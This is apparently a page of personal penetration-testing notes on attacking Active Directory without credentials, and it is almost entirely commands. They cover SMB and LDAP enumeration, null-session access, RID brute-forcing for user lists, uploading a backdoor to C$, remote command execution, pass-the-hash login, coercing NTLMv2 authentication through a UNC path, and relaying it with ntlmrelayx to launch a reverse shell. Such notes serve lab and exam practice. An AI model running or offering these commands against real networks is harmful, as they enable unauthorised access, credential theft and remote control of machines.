Without Credentials

Host Discovery

nmap -sn 192.168.2.0/24

fping -a -g 192.168.2.0/24 2>/dev/null

Scan the network

If we find a vulnerable host we can get easily access to a machine https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/active-directory/classic-attacks.md

# Enumerate smb hosts
cme smb IP/CIDR

# Search smb vulns
nmap -PN --script smb-vuln* -p 139,445 IP

Zone transfer

dig axfr domain@nameserver

Enumerate null session

smbmap -u "" -p "" -H <dc-ip>
smbmap -u "guest" -p "" -H <dc-ip>

To list all drives

smbmap -H -u -p -L

To list contents of C$

smbmap -H -u -p -r 'C$'

To upload files

smbmap -H -u -p --upload '/root/backdoor' 'C$\backdoor'

To download files

smbmap -H -u -p --download 'C$\flag.txt

To execute commands

smbmap -H -u -p -x 'ipconfig',ma

Enumerate null session

smbclient -L <ip> -N
smbclient //<ip>/public -N

Enumerate with credentials

smbclient -L <ip> -U <user>
smbclient //<ip>/public -U <user>
mbclient //192.168.50.212/secrets -U <user> --pw-nt-hash <hash>

Enumerate ldap

ldapsearch -x -h <ip> -s domain

Find User List

cme smb <ip> --users 
cme smb <ip> --users | grep -E '^\s*SMB\s' | awk '{print $5}'

crackmapexec smb <ip> -u "" -p "" --rid-brute > valid_ad
crackmapexec smb <ip> -u "guest" -p "" --rid-brute | grep -oP '(?<=: ).*(?= \(SidTypeUser\))' | awk -F'\\\\' '{print $2}' > valid_ad

Grab NTLMv2 hash

https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/

File Upload

When we discover a file upload form in a web application on a Windows server, we can try to enter a non-existing file with a UNC path like \\192.168.119.2\share\nonexistent.txt. If the web application supports uploads via SMB, the Windows server will authenticate to our SMB server.

Relaying NTLMv2

SMB Relaying

Using a powershell one liner encoded should work as reverse shell (Use Encoded powershell payload)

impacket-ntlmrelayx --no-http-server -smb2support -t <target_ip> -c <reverse_shell>

PreviousACTIVE DIRECTORY NextWith Username

Last updated 3 months ago